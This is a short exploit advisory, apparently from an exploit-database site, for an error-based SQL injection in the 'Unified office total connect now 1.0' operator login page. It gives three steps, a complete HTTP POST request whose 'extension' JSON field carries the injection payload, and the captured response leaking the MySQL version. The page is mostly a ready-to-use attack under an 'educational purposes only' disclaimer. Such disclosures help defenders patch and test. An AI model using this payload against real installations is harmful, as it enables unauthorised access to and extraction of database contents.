Unified office total connect now 1.0 data sql injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-06-17 |
Type : webapps |
Platform : php
This exploit / vulnerability Unified office total connect now 1.0 data sql injection is for educational purposes only and if it is used you will do on your own risk!
1. Go to url http://localhost/operator/operatorLogin.php and login
2. Capture the request in Burpsuite and use the payload as given below.
3. Observe the response which reveals the DB version of mysql.
POST /operator/operatorLogin.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 178
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/operator/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81
data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}
HTTP/1.1 400 Bad Request
Date: Wed, 16 Jun 2021 12:49:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8
Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
